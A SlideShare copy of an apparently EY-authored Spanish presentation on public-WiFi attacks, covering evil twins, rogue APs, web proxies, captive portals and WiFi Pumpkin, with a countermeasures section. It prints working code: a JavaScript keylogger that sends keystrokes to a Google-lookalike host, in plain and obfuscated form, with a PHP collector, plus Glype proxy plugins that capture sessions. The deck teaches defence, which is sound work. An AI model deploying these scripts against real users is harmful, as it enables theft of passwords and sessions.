SlideShare a Scribd company logo
1 of 50
Download to read offline
FreeWiFi
Rouge AP, Evil Twin, Portal cautivo con proxy web son partes de una
constante amenaza a redes inalámbricas:
Aprendamos los posibles ataques para saber como protegernos.
Contenido
¿Quiénes somos?
Definiciones
Herramientas y ataques
Manos a la obra: Proxy Web
Otros Proxies
Manos a la obra: Keylogger JS
Manos a la obra: Portal cautivo
Manos a la obra: WiFi Pumpkin
Aprendamos a protegernos
Despierta tu curiosidad
FreeWifi
Aprendamos los posibles ataques para saber como protegernos
Page 3 3
¿Quiénes somos?
► Talento & Emprendimiento
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
¿Quiénes somos?
http://www.ey.com/About-us/Entrepreneurship
Los emprendedores marcan la diferencia. Tienen grandes ideas y el impulso necesario para llevarlas a cabo. Gracias a sus
visiones innovadoras y a su trabajo, estimulan un cambio social positivo, aportando nuevos conceptos y productos al mercado
y creando empleo y riqueza.
Llevamos mucho tiempo reconociendo el potencial de los emprendedores. En los últimos treinta años, hemos adaptado
nuestra experiencia, conocimiento sectorial y recursos para trabajar con las compañías emprendedoras y de rápido
crecimiento. Trabajamos con una gran variedad de empresas, desde aquellas que realizan su primera operación de
financiación hasta las de mediana capitalización, cuyo valor se puede medir en miles de millones de dólares.
Nuestro compromiso con las compañías emprendedoras en todo el mundo, tanto en las economías emergentes como en las
maduras, nos asegura el trabajar junto a muchos de los líderes globales del mañana.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Wiktor Nykiel
Senior Manager en el área de Ciber Inteligencia.
wiktor.nykiel@es.ey.com
https://es.linkedin.com/in/wiktornykiel
@WiktorNykiel
Héctor Pantoja
Senior en el Área de Attack and Penetration
hector.pantojagarcia@es.ey.com
https://es.linkedin.com/in/héctor-pantoja-garcía-21097958
@hpantojagarcia
Page 6 6
Definiciones
► Aprendamos algo nuevo …
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Definiciones
► Proxy Transparente
Tiene las mismas funciones que un Proxy, pero en
este modo el propio cliente no es consciente del
uso de un Proxy que esta redireccionando y
gestionando las peticiones que envía y recibe. El
cliente no necesita configurar los navegadores para
el uso de dicho Proxy. Este modo es utilizado por
los proveedores de servicios de internet (ISP) y se
suele utilizar para mejorar la velocidad de descarga.
► Proxy
Servidor que permite la intercepción y redirección de las
peticiones recibidas en una red interna hacia Internet,
controlando de una manera eficiente todas las entradas y
salidas de una red e incluso permite modificar las cabeceras
y el contenido para mantener la privacidad de la
comunicación. El usuario sabe en todo momento que esta
utilizando un Proxy.
► Proxy Web
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Definiciones
► Evil Twin
Es un punto de acceso WIFI que sirve para interceptar las comunicaciones
inalámbricas.
Se hace pasar por un proveedor de comunicaciones o bien por un hotspot engañando
a usuarios con dispositivos móviles, tablets o portátiles para que se conecten a él.
Crea una web totalmente fraudulenta, parecida al phishing para recopilar credenciales
o monitorizar el trafico que produzcan.
► Rouge AP
Es un dispositivo que suplanta la identidad de un Punto de Acceso Existente para poder recopilar credenciales de usuarios que soliciten loguearse.
Para poder realizar esto, el dispositivo replica el ESSID y las características de cifrado de un Punto de Acceso cualquiera suplantando toda su
configuración.
El Rogue AP se mantendrá a la escucha de peticiones de sus victimas. Una vez logueada la victima, se obtendrán sus credenciales y se podrá
monitorizar el tráfico que genere.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Definiciones
► Spoofing
Es la suplantación de identidad de un usuario o servidor en concreto ayudándose con una serie de técnicas,
para la obtención de algún tipo de información relevante. Se falsifica el origen de los paquetes para hacer
creer a la victima que procede de un host de confianza o autorizado
► IP Spoofing
Suplanta la dirección IP de un determinado servidor para recopilar credenciales de las victimas. Consigue
sustituir la IP de origen de un paquete TCP/IP por la dirección deseada, de esta forma todas las peticiones
llegaran al servidor falsificado obteniéndose así una monitorización del tráfico muy interesante.
► ARP Spoofing
Es la suplantación de identidad de la tabla ARP. Dicha tabla se encarga de traducir direcciones IP a
direcciones MAC. La forma de falsificar dicha tabla es inundando la red con paquetes ARP indicando que la
MAC asociada a la IP solicitada es nuestra y además nuestra MAC esta también asociada al Gateway.
De esta forma el resto de máquinas actualizarán sus tablas ARP con esta información falsificada y cada vez
que quieran acceder a un destino pasaran por la maquina atacante para esnifar el trafico, redirigir la salida o
ambas.
► DNS Spoofing
Es una técnica que altera o falsifica las direcciones IP asociadas a los servidores DNS y las redireccionan a
servidores maliciosos. La forma de conseguir esto es modificando las peticiones recibidas falsificando la
relación IP-DNS o comprometer un servidor e inundar la red con la cache infectada en el resto de servidores.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Definiciones
► Keylogger
Un keylogger es un software/hardware que permite registrar todas las pulsaciones en un equipo para posteriormente enviarlas al atacante.
► Keylogger JS
Keylogger JS es una variedad que permite capturar texto introducido por un usuario en los formularios de la web afectada, a través de la inyección de
un código JavaScript que genera una “capa transparente” que recoge y envía todas las pulsaciones a un servidor remoto.
Page 11 11
Herramientas y ataques
► Diferentes formas de hacer el mal …
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFiPhisher
► Ataques Evil Twin
Consigue hacerse con man-in-the-middle a través de ataques del tipo Evil Twin, donde
posteriormente redirige todo el trafico HTTP a un sitio web controlado por el atacante.
Este ataque se compone de tres pasos:
 La victima es desautenticada de su punto de acceso original.
Esto se consigue haciendo jamming para “Deauthenticate” o “Disassociate” al cliente.
 El cliente desauntenticado se conecta al punto de acceso atacante.
Esta herramienta copia automáticamente las configuraciones del punto de acceso originaly
crea un punto de acceso falso. Establece la configuración NAT/DHCP para que el cliente se
conecte a la red falsa, consiguiendo que la victima acabe bajo el ataque MiTM.
 Se presenta una página de configuración de router al cliente.
Incluye un servidor web el cual atiende peticiones HTTP/S y lanza páginas de phishing
preguntando por credenciales.
https://github.com/sophron/wifiphisher
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
LINSET
► Linset Is Not a Social Enginering Tool
Consigue hacerse las credenciales WPA/2 desautenticando al cliente
original, redirige todo el trafico HTTP a un sitio web controlado por el
atacante, probando las credenciales introducidas por el usuario.
Este ataque se compone de tres pasos:
 Crea un punto de acceso con el mismo SSID que el AP original.
 La victima es des-autenticada de su punto de acceso original.
 Se presenta una página para introducir las credenciales de la victima.
Ref: https://github.com/vk496/linset
http://highsec.es/2014/10/linset-tirando-el-anzuelo/
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
SET
► Social Engineering Toolkit
Es una herramienta que permite utilizar varias técnicas de Ingeniería
Social.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WPAD
Ref: http://findproxyforurl.com/wpad-introduction/
https://technet.microsoft.com/en-us/library/cc995258.aspx
http://perimetergrid.com/wp/2008/01/11/wpad-internet-explorers-worst-feature/
► Web Proxy Auto Discovery
Es la tecnología que ayuda al navegador a localizar las configuraciones de proxies automáticamente usando DNS o DHCP.
DHCP DNS
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
MITMF
► Man In The Middle Framework
Es la tecnología que ayuda al navegador a localizar las configuraciones de proxies automáticamente usando DNS o DHCP.
Page 17 17
Manos a la obra
► Veamos un ejemplo práctico: Proxy Web
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Web Proxy
► Glype Web Proxy
Esto es un proxy web escrito en PHP que funciona igualmente
Se pueden robar sesiones, sacar datos interesantes. Se puede tener trazas de navegación, valores de parámetros GET
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Web Proxy
► Glype Web Proxy ► Opciones de configuración
1. Encrypt URL: Permite obfuscar la URL para que no sea
reconocible cuando se manda de forma recursiva al proxy.
2. Encrypt Page: Manda la página ofuscada antes de enviarla, para
des obfuscar en el cliente una vez recibido. Esto a veces produce
errores en la navegación
3. Show Form: Muestra una barra con un formulario en la parte
superior del navegador para poder introducir la URL a visitar así
como modificar posibles parámetros.
4. Allow Cookies y Force Temporary Cookies: Permite trabajar
con cookies, hay opción de visualizar estas cookies almacenadas
en el servidor.
5. Remove Page Titles: Quitamos el titulo de la página (se queda
en el histórico de navegación – a veces da demasiados datos).
6. Remove Scripts: Quita scripts JS / Flash / Java que puedan
desvelar la ubicación, etc
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Modificaciones al Web Proxy
Index.html que invoca desde iframe el proxy web
<html>
<head>
<title>Navegación super segura</title>
</head>
<body>
<iframe src="browse.php?u=http%3A%2F%2Fwww.google.com%2F&b=4"
width="100%" height="100%" scrolling="auto" frameborder="0">
<p>Texto alternativo para navegadores que no aceptan iframes.</p>
</iframe>
</body>
</html>
// Plugins/google.com.php
function preParse($html,$type) {
if (stripos($html,'loadingError')) {
header("Location: ".proxyURL('http://mail.google.com/mail/?ui=html'));
exit;
}
return $html;
}
function postParse(&$in,$type) {
$in = preg_replace('# style="padding-top:d+px"#', '', $in);
return $in;
}
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Modificaciones al Web Proxy
// Plugins/facebook.com.php
$options['stripJS'] = false;
$options['allowCookies'] = true;
function preRequest() {
global $URL;
if ($URL['host'] != 'm.facebook.com') {
$URL['host'] = preg_replace('/((www.)?facebook.com)/', 'm.facebook.com', $URL['host']);
$URL['href'] = preg_replace('///((www.)?facebook.com)/', '//m.facebook.com', $URL['href']);
}
}
Modificamos texto al vuelo en el parser para
añadir/quitar URL, funciones, etc en la página
visitada a través del proxy.
Page 22 22
Otros proxies
► Capturando datos de diferentes formas …
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
OWASP ZAP + Login HTTPS Ref: https://github.com/zaproxy/zaproxy
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Burp Suite Professional
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Fiddler
Page 26 26
Manos a la obra
► Veamos un ejemplo práctico: Keylogger JS
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Keylogger JS
<?php
if(!empty($_GET['datosRecibidos'])) {
$logfile = fopen('datos.txt', 'a+');
fwrite($logfile, $_GET['datosRecibidos']);
fclose($logfile);
}
?>
var buffer = [];
var attacker = 'http://accounts.google.com-servicelogin.sacu-1.hl-en.seguridad-
wifi.com/account/login/secure/protocol/g00/keylogger/?datosRecibidos='
document.onkeypress = function(e) {
buffer.push(e.key);
}
window.setInterval(function() {
if (buffer.length > 0) {
var data = encodeURIComponent(JSON.stringify(buffer));
new Image().src = attacker + data;
buffer = [];
}
}, 300);
Index.php – script php que almacena datos recibidos en fichero
Keylogger.js – script JS que envia los datos a index.php para ser almacenados
var
_0xd495=["x68x74x74x70x3Ax2Fx2Fx61x63x63x6Fx75x6Ex74x73x2Ex67x6Fx6
Fx67x6Cx65x2Ex63x6Fx6Dx2Dx73x65x72x76x69x63x65x6Cx6Fx67x69x6Ex2E
x73x61x63x75x2Dx31x2Ex68x6Cx2Dx65x6Ex2Ex73x65x67x75x72x69x64x61x
64x2Dx77x69x66x69x2Ex63x6Fx6Dx2Fx61x63x63x6Fx75x6Ex74x2Fx6Cx6Fx6
7x69x6Ex2Fx73x65x63x75x72x65x2Fx70x72x6Fx74x6Fx63x6Fx6Cx2Fx67x30
x30x2Fx6Bx65x79x6Cx6Fx67x67x65x72x2Fx3Fx64x61x74x6Fx73x52x65x63x6
9x62x69x64x6Fx73x3D","x6Fx6Ex6Bx65x79x70x72x65x73x73","x6Bx65x79","x7
0x75x73x68","x6Cx65x6Ex67x74x68","x73x74x72x69x6Ex67x69x66x79","x73x7
2x63","x73x65x74x49x6Ex74x65x72x76x61x6C"];var buffer=[];var
attacker=_0xd495[0];document[_0xd495[1]]=function(_0x61fcx3){buffer[_0xd495[3]](_0x61fcx
3[_0xd495[2]])};window[_0xd495[7]](function(){if(buffer[_0xd495[4]]>0){var
_0x61fcx4=encodeURIComponent(JSON[_0xd495[5]](buffer)); new
Image()[_0xd495[6]]=attacker+_0x61fcx4;buffer=[];}},300);
Obfuscado con: http://javascriptobfuscator.com/Javascript-Obfuscator.aspx
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Keylogger JS
Prueba.php – script PHP con formularios que muestra el funcionamiento del keylogger
<script src="http://accounts.google.com-
servicelogin.sacu-1.hl-en.seguridad-
wifi.com/account/login/secure/protocol/g00/keylogger/s
cript-super-importante.js">
</script>
<html>
<head><title>Ejemplo de formulario
sencillo</title></head>
<body>
<h3>Formulario muy sencillo</h3>
<form action="?" method="post">
Escribe tu nombre:
<br/><input type="text" name="nombre" value=""
size="80"/>
<br/>
Escribe tu clave:
<br/><input type="password" name="passswd"
value="" size="80"/>
<br/><input type="submit" value="Enviar" />
</form>
<br />
<a href="datos.txt" target="_blank">Abre el fichero con
los datos recogidos</a>
</body>
</html>
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
BeEF – Browser Exploitation Framework
Page 30 30
Manos a la obra
► Veamos un ejemplo práctico: Portal cautivo
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Portal cautivo https://meraki.cisco.com/lib/pdf/meraki_whitepaper_captive_portal.pdf
Page 32 32
Manos a la obra
► Veamos un ejemplo práctico: WiFi Pumpkin
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFi Pumpkin – Caso practico RougeAP
Framework para Ataques Rouge AP, funciona bajo una Kali 2.0
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFi Pumpkin - Instalación
Proceso de instalación
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFi Pumkin - Funcionamiento
Framework iniciado con un cliente conectado y autenticado. Interfaz Wifi (wlan0)
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFi Pumpkin – Capturando datos
Credenciales capturadas en una web sin SSL a través del punto de acceso falso.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFi Pumpkin – Fake Updates
Creamos una página clonada de los servicios de actualizaciones más usados, el cual añade Malware en el ejecutable de
la descarga.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WiFi Pumpkin - Actualizaciones
Página web clonada con aspecto del servicio de actualizaciones de Microsoft.
Page 39 39
Aprendamos a protegernos
► Cuida tus datos en todo momento …
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Contramedidas
• Para solventar el IP Spoofing, se puede configurar el router con reglas de acceso (ACLs) para determinadas MAC. De esta
forma se dará acceso a maquinas determinadas.
• Utilización de cifrado de la comunicación y Autenticación de Usuarios.
• Utilización de DHCP Snooping para evitar el ARP Spoofing, de esta forma se mantiene un registro de las direcciones MAC
conectadas a cada puerto, sabiendo en cada momento si se recibe una suplantación ARP.
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Protegiéndose de Evil Twin AP y otros ataques wifi
• Uso de aplicaciones móviles como hotspotid.com
• Puntos de acceso con detección de Rouge AP
• Scripts para monitorizar, descubrir y prevenir ataques Evil Twin AP
https://github.com/moha99sa/EvilAP_Defender/wiki
• Uso de WIPS / WIDS
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
hotspotid.com
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
WIDS y otros sistemas anti Rouge AP https://meraki.cisco.com/technologies/air-marshal-wips
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Autenticación de doble Factor - 2FA
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
VPN – Protegiendo nuestro tráfico
“ Las conexiones VPN permiten cifrar el tráfico entre nuestro móvil y un entorno seguro “
Page 46 46
Despierta tu curiosidad
► Siguientes retos …
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Cosas para probar
› http://null-byte.wonderhowto.com/how-to/hack-wi-fi-creating-evil-twin-wireless-access-point-eavesdrop-data-0147919/
(Como crear puntos de acceso Evil Twin para espiar y obtener datos)
› https://github.com/entropy1337/infernal-twin (herramienta de hacking WiFi automatizada)
› https://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/ (punto de acceso falso con
Raspberry PI y alguna otra cosa)
› https://github.com/DanMcInerney/wifijammer (inhibe todo el tráfico wifi entre clientes y puntos de acceso a
base de inyectar paquetes)
› https://github.com/DanMcInerney/fakeAP (crear punto de acceso falso)
› https://github.com/DanMcInerney/injecthtml/blob/master/injecthtml.git/injecthtml.py (inyecta código HTML - probar
con Beef o JSKeylogger)
› https://github.com/DanMcInerney/LANs.py (monitoriza a los clientes más activos e inyecta código HTML o
hace denegación de servicio)
› http://resources.infosecinstitute.com/beef-part-1/ (Introducción a Beef )
› http://docs.mitmproxy.org/en/latest/tutorials/transparent-dhcp.html (Proxies transparentes con maquinas
virtuales)
› https://blog.skullsecurity.org/2009/pwning-hotel-guests (ataques con WPAD)
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Como saltarse la autenticación de proxies
http://null-byte.wonderhowto.com/how-to/hack-wi-fi-evading-authentication-proxy-using-icmptx-0150347/
Saltándose portal cautivo a través de DNS tunneling
http://dnstunnel.de/
Evadiendo Proxies
› http://kinozoa.com/blog/subterfuge-documentation/
› https://github.com/Subterfuge-Framework/Subterfuge
› http://www.monkey.org/~dugsong/dsniff/
› https://github.com/derv82/wifite
› http://resources.infosecinstitute.com/20-popular-wireless-hacking-tools-updated-for-2016/
› https://github.com/supernothing/sergio-proxy
› https://github.com/sensepost/mana
MITM & Other tools
FreeWiFi
Aprendamos los posibles ataques para saber como protegernos
Artículos relacionados
› http://thehackernews.com/2014/03/snoopy-drone-can-hack-your-smartphones.html
› https://blog.skullsecurity.org/2009/pwning-hotel-guests
› https://mdk.fr/0x000000/articles/Web_Proxy_Autodiscovery_Protocol_Hijacking.html
› https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/
• Snarfing
• Evil Twin
• WIPS
• Rouge Acces Point
• WPAD
• ARP Spoofing
• DNS Spoofing
Definiciones
https://en.wikipedia.org/wiki/Snarfing
https://en.wikipedia.org/wiki/Evil_twin_(wireless_networks)
https://en.wikipedia.org/wiki/Wireless_intrusion_prevention_system
https://en.wikipedia.org/wiki/Rogue_access_point
https://en.wikipedia.org/wiki/Web_Proxy_Autodiscovery_Protocol
https://en.wikipedia.org/wiki/ARP_spoofing#Defense
https://en.wikipedia.org/wiki/DNS_spoofing
Wiktor Nykiel
Email wiktor.nykiel@es.ey.com
LinkedIn wiktornykiel
Twitter @WiktorNykiel

More Related Content

What's hot

éTica y estética en la red
éTica y estética en la redéTica y estética en la red
éTica y estética en la redclaudiatrabanco
 
Pc zombie, Phishing Ransomware, Scam, Span, Spin
Pc zombie, Phishing Ransomware, Scam, Span, SpinPc zombie, Phishing Ransomware, Scam, Span, Spin
Pc zombie, Phishing Ransomware, Scam, Span, Spinprincesitacute
 
éTica y estética en la interacción en la red
éTica y estética en la interacción en la redéTica y estética en la interacción en la red
éTica y estética en la interacción en la redadrian corgo gomez
 
Pc zombie – ramsomware – spam – phishing23
Pc zombie – ramsomware – spam – phishing23Pc zombie – ramsomware – spam – phishing23
Pc zombie – ramsomware – spam – phishing23rycardo182
 
Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]
Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]
Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]RootedCON
 
Criptografía moderna. No Siempre es SecretA (NSA)
Criptografía moderna. No Siempre es SecretA (NSA)Criptografía moderna. No Siempre es SecretA (NSA)
Criptografía moderna. No Siempre es SecretA (NSA)Jorge Martínez Taboada
 
Curso Virtual de Hacking con Kali Linux 2019
Curso Virtual de Hacking con Kali Linux 2019Curso Virtual de Hacking con Kali Linux 2019
Curso Virtual de Hacking con Kali Linux 2019Alonso Caballero
 
Phishing, uno de los ataques cibernéticos más populares
Phishing, uno de los ataques cibernéticos más popularesPhishing, uno de los ataques cibernéticos más populares
Phishing, uno de los ataques cibernéticos más popularesSupra Networks
 
Pc zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7
Pc  zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7Pc  zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7
Pc zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7marinmoran
 
Conexión inversa. Análisis Forense en medios de pago.
Conexión inversa. Análisis Forense en medios de pago.Conexión inversa. Análisis Forense en medios de pago.
Conexión inversa. Análisis Forense en medios de pago.Eventos Creativos
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umhAlejandro Quesada
 

What's hot (19)

éTica y estética en la red
éTica y estética en la redéTica y estética en la red
éTica y estética en la red
 
Pc zombie
Pc zombiePc zombie
Pc zombie
 
Pc zombie
Pc zombiePc zombie
Pc zombie
 
Pc zombie, Phishing Ransomware, Scam, Span, Spin
Pc zombie, Phishing Ransomware, Scam, Span, SpinPc zombie, Phishing Ransomware, Scam, Span, Spin
Pc zombie, Phishing Ransomware, Scam, Span, Spin
 
éTica y estética en la interacción en la red
éTica y estética en la interacción en la redéTica y estética en la interacción en la red
éTica y estética en la interacción en la red
 
Hacking etico remington
Hacking etico remingtonHacking etico remington
Hacking etico remington
 
Tema 13
Tema 13Tema 13
Tema 13
 
T03 02 criptografia
T03 02 criptografiaT03 02 criptografia
T03 02 criptografia
 
Ing social
Ing socialIng social
Ing social
 
Pc zombie – ramsomware – spam – phishing23
Pc zombie – ramsomware – spam – phishing23Pc zombie – ramsomware – spam – phishing23
Pc zombie – ramsomware – spam – phishing23
 
Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]
Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]
Abraham Pasamar - Quien esta leyendo mi correo [rootedvlc2018]
 
Criptografía moderna. No Siempre es SecretA (NSA)
Criptografía moderna. No Siempre es SecretA (NSA)Criptografía moderna. No Siempre es SecretA (NSA)
Criptografía moderna. No Siempre es SecretA (NSA)
 
Curso Virtual de Hacking con Kali Linux 2019
Curso Virtual de Hacking con Kali Linux 2019Curso Virtual de Hacking con Kali Linux 2019
Curso Virtual de Hacking con Kali Linux 2019
 
Phishing, uno de los ataques cibernéticos más populares
Phishing, uno de los ataques cibernéticos más popularesPhishing, uno de los ataques cibernéticos más populares
Phishing, uno de los ataques cibernéticos más populares
 
Pc zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7
Pc  zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7Pc  zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7
Pc zombie, spim, spear, phishing, ransomware, spam, scam tarea 7, semana 7
 
Conexión inversa. Análisis Forense en medios de pago.
Conexión inversa. Análisis Forense en medios de pago.Conexión inversa. Análisis Forense en medios de pago.
Conexión inversa. Análisis Forense en medios de pago.
 
Actividad 6
Actividad 6Actividad 6
Actividad 6
 
Trabajo de informática - Phishing
Trabajo de informática - PhishingTrabajo de informática - Phishing
Trabajo de informática - Phishing
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umh
 

Similar to Ey ciber seg uah 2016 freewifi

Privacidad En La Red miguel laviña y carlos tomey
Privacidad En La Red  miguel laviña y carlos tomeyPrivacidad En La Red  miguel laviña y carlos tomey
Privacidad En La Red miguel laviña y carlos tomeyxhelazz
 
Privacidad En La Red
Privacidad En La RedPrivacidad En La Red
Privacidad En La Redxhelazz
 
Privacidad En La Red
Privacidad En La RedPrivacidad En La Red
Privacidad En La Redxhelazz
 
Prevencion de ataques de ingenieria social Semana 5..pptx
Prevencion de ataques de ingenieria social Semana 5..pptxPrevencion de ataques de ingenieria social Semana 5..pptx
Prevencion de ataques de ingenieria social Semana 5..pptxleonardolopezsa
 
Ataques Y Vulnerabilidad
Ataques Y VulnerabilidadAtaques Y Vulnerabilidad
Ataques Y Vulnerabilidadpachiuss
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidadeslamugre
 
Ataques y vulnerabilidad
Ataques y vulnerabilidadAtaques y vulnerabilidad
Ataques y vulnerabilidadguest7373c3b
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridadkiensoiyo
 
PRESENTACION DOS
PRESENTACION DOSPRESENTACION DOS
PRESENTACION DOSmirofa
 
Seguridad en Aplicaciones Web y Comercio Electrónico
Seguridad en Aplicaciones Web y Comercio ElectrónicoSeguridad en Aplicaciones Web y Comercio Electrónico
Seguridad en Aplicaciones Web y Comercio ElectrónicoRené Olivo
 
Ataque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali LinuxAtaque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali LinuxCarlos Otero
 
ANÁLISIS-DE-METADATOS-1(2).pptx
ANÁLISIS-DE-METADATOS-1(2).pptxANÁLISIS-DE-METADATOS-1(2).pptx
ANÁLISIS-DE-METADATOS-1(2).pptxJeryBrand
 
Practicas proxy
Practicas proxyPracticas proxy
Practicas proxyyese94
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informáticaKERNEL404
 

Similar to Ey ciber seg uah 2016 freewifi (20)

Privacidad En La Red miguel laviña y carlos tomey
Privacidad En La Red  miguel laviña y carlos tomeyPrivacidad En La Red  miguel laviña y carlos tomey
Privacidad En La Red miguel laviña y carlos tomey
 
Privacidad En La Red
Privacidad En La RedPrivacidad En La Red
Privacidad En La Red
 
Privacidad En La Red
Privacidad En La RedPrivacidad En La Red
Privacidad En La Red
 
Prevencion de ataques de ingenieria social Semana 5..pptx
Prevencion de ataques de ingenieria social Semana 5..pptxPrevencion de ataques de ingenieria social Semana 5..pptx
Prevencion de ataques de ingenieria social Semana 5..pptx
 
Ataques Y Vulnerabilidad
Ataques Y VulnerabilidadAtaques Y Vulnerabilidad
Ataques Y Vulnerabilidad
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidades
 
Ataques y vulnerabilidad
Ataques y vulnerabilidadAtaques y vulnerabilidad
Ataques y vulnerabilidad
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Main in the middle
Main in the middleMain in the middle
Main in the middle
 
Reporte de Seguridad
Reporte de SeguridadReporte de Seguridad
Reporte de Seguridad
 
PRESENTACION DOS
PRESENTACION DOSPRESENTACION DOS
PRESENTACION DOS
 
Seguridad en Aplicaciones Web y Comercio Electrónico
Seguridad en Aplicaciones Web y Comercio ElectrónicoSeguridad en Aplicaciones Web y Comercio Electrónico
Seguridad en Aplicaciones Web y Comercio Electrónico
 
Ataque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali LinuxAtaque DNS spoofing con Kali Linux
Ataque DNS spoofing con Kali Linux
 
ANÁLISIS-DE-METADATOS-1(2).pptx
ANÁLISIS-DE-METADATOS-1(2).pptxANÁLISIS-DE-METADATOS-1(2).pptx
ANÁLISIS-DE-METADATOS-1(2).pptx
 
Pc zombie
Pc zombiePc zombie
Pc zombie
 
Proyecto 6
Proyecto 6Proyecto 6
Proyecto 6
 
Practicas proxy
Practicas proxyPracticas proxy
Practicas proxy
 
Tarea proxy
Tarea proxyTarea proxy
Tarea proxy
 
Ataquesyvulnerabilidad
AtaquesyvulnerabilidadAtaquesyvulnerabilidad
Ataquesyvulnerabilidad
 
Seguridad informática
Seguridad informáticaSeguridad informática
Seguridad informática
 

More from Wiktor Nykiel ✔

Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...
Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...
Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...Wiktor Nykiel ✔
 
Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...
Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...
Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...Wiktor Nykiel ✔
 
From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...
From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...
From Zero to OSINT Hero - Universidad de Alcalá de Henares - Ivan Portillo Mo...Wiktor Nykiel ✔
 
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoCybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hago
Cybercamp17 Threat Intelligence - Desde qué es hasta cómo lo hagoWiktor Nykiel ✔
 
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...
EY Spain - CiberSeg UAH 2017 - Taller de creación de tools de inteligencia - ...Wiktor Nykiel ✔
 

More from Wiktor Nykiel ✔ (6)

Flyer osint city 2019
Flyer osint city 2019Flyer osint city 2019
Flyer osint city 2019
 
Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...
Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...
Osintcity 2019 - Inteligencia aplicada al mundo cyber - Ivan Portillo Morales...
 
Universidad de Alcalá de Henares y Cátedra de Ciberseguridad de Isdefe - Juev...
